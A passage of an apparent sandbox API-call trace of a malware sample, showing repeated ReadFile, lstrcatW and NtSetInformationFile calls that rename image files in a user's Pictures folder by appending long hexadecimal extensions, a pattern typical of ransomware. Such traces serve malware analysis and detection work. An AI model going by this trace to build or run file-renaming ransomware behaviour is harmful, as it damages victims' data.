(in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x24fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x24fff70) returned 0x0 [0125.195] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\C9WQy_h\\81v6QqYDbFk.jpg", lpString2=".3CF358D671F41C439CD83306A17EB09B8A5FA2218B30EBD7635986CA8E8A6218" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\C9WQy_h\\81v6QqYDbFk.jpg.3CF358D671F41C439CD83306A17EB09B8A5FA2218B30EBD7635986CA8E8A6218") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\C9WQy_h\\81v6QqYDbFk.jpg.3CF358D671F41C439CD83306A17EB09B8A5FA2218B30EBD7635986CA8E8A6218" [0125.195] GetProcessHeap () returned 0x600000 [0125.195] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x12a) returned 0x31543d8 [0125.196] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x24fff60, FileInformation=0x31543d8, Length=0x12a, FileInformationClass=0xa) returned 0x0 [0125.197] CloseHandle (hObject=0x31c) returned 1 [0125.199] GetProcessHeap () returned 0x600000 [0125.199] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0125.199] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.203] ReadFile (in: hFile=0x31c, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0125.204] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.205] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x24fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x24fff70) returned 0x0 [0125.205] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\C9WQy_h\\D8pVz.gif", lpString2=".CDC421AA4250313101D4C4B93ED6BA9EA10FF26901D463D01522AFEB128BE177" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\C9WQy_h\\D8pVz.gif.CDC421AA4250313101D4C4B93ED6BA9EA10FF26901D463D01522AFEB128BE177") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\C9WQy_h\\D8pVz.gif.CDC421AA4250313101D4C4B93ED6BA9EA10FF26901D463D01522AFEB128BE177" [0125.205] GetProcessHeap () returned 0x600000 [0125.205] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x11e) returned 0x31192f8 [0125.205] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x24fff60, FileInformation=0x31192f8, Length=0x11e, FileInformationClass=0xa) returned 0x0 [0125.207] CloseHandle (hObject=0x31c) returned 1 [0125.207] GetProcessHeap () returned 0x600000 [0125.207] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0125.207] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.211] ReadFile (in: hFile=0x31c, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0125.212] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.213] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x24fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x24fff70) returned 0x0 [0125.213] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\C9WQy_h\\I64oqwj9FPZQk.jpg", lpString2=".6723169AC26469F11F452B5D64F8E24D5F59487851C10CF60F8C4EFF9C9B5310" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\C9WQy_h\\I64oqwj9FPZQk.jpg.6723169AC26469F11F452B5D64F8E24D5F59487851C10CF60F8C4EFF9C9B5310") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\C9WQy_h\\I64oqwj9FPZQk.jpg.6723169AC26469F11F452B5D64F8E24D5F59487851C10CF60F8C4EFF9C9B5310" [0125.213] GetProcessHeap () returned 0x600000 [0125.213] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x12e) returned 0x3154d98 [0125.214] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x24fff60, FileInformation=0x3154d98, Length=0x12e, FileInformationClass=0xa) returned 0x0 [0125.215] CloseHandle (hObject=0x31c) returned 1 [0125.215] GetProcessHeap () returned 0x600000 [0125.215] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0125.215] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.233] ReadFile (in: hFile=0x31c, lpBuffer=0x3360140, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0125.234] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.236] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x24fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x24fff70) returned 0x0 [0125.236] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\C9WQy_h\\Prz_nhOiA.jpg", lpString2=".33848675A8BC25FD2D2ECE81039F5B0A01AC5908D766ABA2C2F7E8C7E9DC696B" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\C9WQy_h\\Prz_nhOiA.jpg.33848675A8BC25FD2D2ECE81039F5B0A01AC5908D766ABA2C2F7E8C7E9DC696B") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\C9WQy_h\\Prz_nhOiA.jpg.33848675A8BC25FD2D2ECE81039F5B0A01AC5908D766ABA2C2F7E8C7E9DC696B" [0125.236] GetProcessHeap () returned 0x600000 [0125.236] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x126) returned 0x31549f0 [0125.236] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x24fff60, FileInformation=0x31549f0, Length=0x126, FileInformationClass=0xa) returned 0x0 [0125.238] CloseHandle (hObject=0x31c) returned 1 [0125.238] GetProcessHeap () returned 0x600000 [0125.238] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0125.239] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.242] ReadFile (in: hFile=0x31c, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0125.243] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.244] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x24fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x24fff70) returned 0x0 [0125.244] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\C9WQy_h\\Rl-Y9JJsJpxwEMRm.png", lpString2=".E10095DCE83F821ADD3FC4514583AABCB9C38284D447FB1339FEE1E21135494A" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\C9WQy_h\\Rl-Y9JJsJpxwEMRm.png.E10095DCE83F821ADD3FC4514583AABCB9C38284D447FB1339FEE1E21135494A") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\C9WQy_h\\Rl-Y9JJsJpxwEMRm.png.E10095DCE83F821ADD3FC4514583AABCB9C38284D447FB1339FEE1E21135494A" [0125.244] GetProcessHeap () returned 0x600000 [0125.244] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x134) returned 0x3151198 [0125.244] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x24fff60, FileInformation=0x3151198, Length=0x134, FileInformationClass=0xa) returned 0x0 [0125.246] CloseHandle (hObject=0x31c) returned 1 [0125.246] GetProcessHeap () returned 0x600000 [0125.246] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0125.247] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.265] ReadFile (in: hFile=0x328, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0125.265] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.266] NtQueryObject (in: Handle=0x328, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x24fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x24fff70) returned 0x0 [0125.267] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\f4nhXOZ2JJMu.gif", lpString2=".19BD521EA18D41C611453BE4CFCE235B9F6A4F2C20B912EE5413115F21CD0E0F" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\f4nhXOZ2JJMu.gif.19BD521EA18D41C611453BE4CFCE235B9F6A4F2C20B912EE5413115F21CD0E0F") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\f4nhXOZ2JJMu.gif.19BD521EA18D41C611453BE4CFCE235B9F6A4F2C20B912EE5413115F21CD0E0F" [0125.267] GetProcessHeap () returned 0x600000 [0125.267] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x11c) returned 0x3119670 [0125.267] NtSetInformationFile (FileHandle=0x328, IoStatusBlock=0x24fff60, FileInformation=0x3119670, Length=0x11c, FileInformationClass=0xa) returned 0x0 [0125.269] CloseHandle (hObject=0x328) returned 1 [0125.270] GetProcessHeap () returned 0x600000 [0125.270] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0125.270] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.273] ReadFile (in: hFile=0x31c, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0125.273] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.275] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x24fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x24fff70) returned 0x0 [0125.275] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\fmAjYu WdJfo pyd48R.png", lpString2=".88F29E9D8781CCC628AF73AA2AF148B6449142A5604BC78E344059E5C0050761" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\fmAjYu WdJfo pyd48R.png.88F29E9D8781CCC628AF73AA2AF148B6449142A5604BC78E344059E5C0050761") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\fmAjYu WdJfo pyd48R.png.88F29E9D8781CCC628AF73AA2AF148B6449142A5604BC78E344059E5C0050761" [0125.275] GetProcessHeap () returned 0x600000 [0125.276] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x12a) returned 0x3154510 [0125.276] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x24fff60, FileInformation=0x3154510, Length=0x12a, FileInformationClass=0xa) returned 0x0 [0125.277] CloseHandle (hObject=0x31c) returned 1 [0125.278] GetProcessHeap () returned 0x600000 [0125.278] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0125.278] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.284] ReadFile (in: hFile=0x31c, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0125.284] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.286] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x24fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x24fff70) returned 0x0 [0125.286] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\Iq2I.png", lpString2=".83BDC694B0FEAFA9C50EE05E04231368166A6050A5769310750926B808F18843" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\Iq2I.png.83BDC694B0FEAFA9C50EE05E04231368166A6050A5769310750926B808F18843") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\Iq2I.png.83BDC694B0FEAFA9C50EE05E04231368166A6050A5769310750926B808F18843" [0125.286] GetProcessHeap () returned 0x600000 [0125.286] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10c) returned 0x336d580 [0125.286] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x24fff60, FileInformation=0x336d580, Length=0x10c, FileInformationClass=0xa) returned 0x0 [0125.288] CloseHandle (hObject=0x31c) returned 1 [0125.288] GetProcessHeap () returned 0x600000 [0125.288] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0125.288] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.293] ReadFile (in: hFile=0x31c, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0125.293] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.294] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x24fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x24fff70) returned 0x0 [0125.295] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\kgFY5VqauJGoEm.jpg", lpString2=".8E7C2E02427DAB651DF0400F3DFEE80DFC79B6B1DF64B68F21FCF9CFCDF46635" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\kgFY5VqauJGoEm.jpg.8E7C2E02427DAB651DF0400F3DFEE80DFC79B6B1DF64B68F21FCF9CFCDF46635") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\kgFY5VqauJGoEm.jpg.8E7C2E02427DAB651DF0400F3DFEE80DFC79B6B1DF64B68F21FCF9CFCDF46635" [0125.295] GetProcessHeap () returned 0x600000 [0125.295] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x120) returned 0x3118e58 [0125.295] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x24fff60, FileInformation=0x3118e58, Length=0x120, FileInformationClass=0xa) returned 0x0 [0125.297] CloseHandle (hObject=0x31c) returned 1 [0125.300] GetProcessHeap () returned 0x600000 [0125.300] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0125.300] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.310] ReadFile (in: hFile=0x31c, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0125.310] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.312] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x24fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x24fff70) returned 0x0 [0125.313] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\pVjes.bmp", lpString2=".6F5C08EBC27D03129ADA051671B9CADD9F1B2CAEC1E3D095FBE6B60DE854B922" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\pVjes.bmp.6F5C08EBC27D03129ADA051671B9CADD9F1B2CAEC1E3D095FBE6B60DE854B922") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\pVjes.bmp.6F5C08EBC27D03129ADA051671B9CADD9F1B2CAEC1E3D095FBE6B60DE854B922" [0125.313] GetProcessHeap () returned 0x600000 [0125.313] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10e) returned 0x336d698 [0125.313] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x24fff60, FileInformation=0x336d698, Length=0x10e, FileInformationClass=0xa) returned 0x0 [0125.314] CloseHandle (hObject=0x31c) returned 1 [0125.315] GetProcessHeap () returned 0x600000 [0125.315] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0125.316] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.320] ReadFile (in: hFile=0x31c, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0125.320] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.321] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x24fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x24fff70) returned 0x0 [0125.322] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\rBytkCOyOZm.bmp", lpString2=".FDC768F719C1033FE68098AEDEB2A1C484A089512E33ECAB2ADC838D94B4B211" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\rBytkCOyOZm.bmp.FDC768F719C1033FE68098AEDEB2A1C484A089512E33ECAB2ADC838D94B4B211") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\rBytkCOyOZm.bmp.FDC768F719C1033FE68098AEDEB2A1C484A089512E33ECAB2ADC838D94B4B211" [0125.322] GetProcessHeap () returned 0x600000 [0125.322] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x11a) returned 0x3118f80 [0125.322] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x24fff60, FileInformation=0x3118f80, Length=0x11a, FileInformationClass=0xa) returned 0x0 [0125.323] CloseHandle (hObject=0x31c) returned 1 [0125.323] GetProcessHeap () returned 0x600000 [0125.323] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0125.324] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.331] ReadFile (in: hFile=0x31c, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0125.331] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.332] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x24fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x24fff70) returned 0x0 [0125.332] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\USSr00p i3Ef9f7T_.png", lpString2=".FDA92DBD0EC50C836640DEA37276D8FBD4392B2DD20BF9B5CA370C003AF23207" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\USSr00p i3Ef9f7T_.png.FDA92DBD0EC50C836640DEA37276D8FBD4392B2DD20BF9B5CA370C003AF23207") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\USSr00p i3Ef9f7T_.png.FDA92DBD0EC50C836640DEA37276D8FBD4392B2DD20BF9B5CA370C003AF23207" [0125.332] GetProcessHeap () returned 0x600000 [0125.332] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x126) returned 0x3153670 [0125.332] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x24fff60, FileInformation=0x3153670, Length=0x126, FileInformationClass=0xa) returned 0x0 [0125.333] CloseHandle (hObject=0x31c) returned 1 [0125.334] GetProcessHeap () returned 0x600000 [0125.334] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0125.334] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.336] ReadFile (in: hFile=0x31c, lpBuffer=0x3360140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3340008) returned 1 [0125.337] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x24fff7c, lpCompletionKey=0x24fff78, lpOverlapped=0x24fff74) returned 1 [0125.337] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x24fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x24fff70) returned 0x0 [0125.338] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\zves_hPpDUBMZ7qjvt.gif", lpString2=".72C86EC95D328A0E8B86524BABC450A0CEC7B215FFC4906A309F11C0A5CC2A6B" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\zves_hPpDUBMZ7qjvt.gif.72C86EC95D328A0E8B86524BABC450A0CEC7B215FFC4906A309F11C0A5CC2A6B") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Pictures\\zves_hPpDUBMZ7qjvt.gif.72C86EC95D328A0E8B86524BABC450A0CEC7B215FFC4906A309F11C0A5CC2A6B" [0125.338] 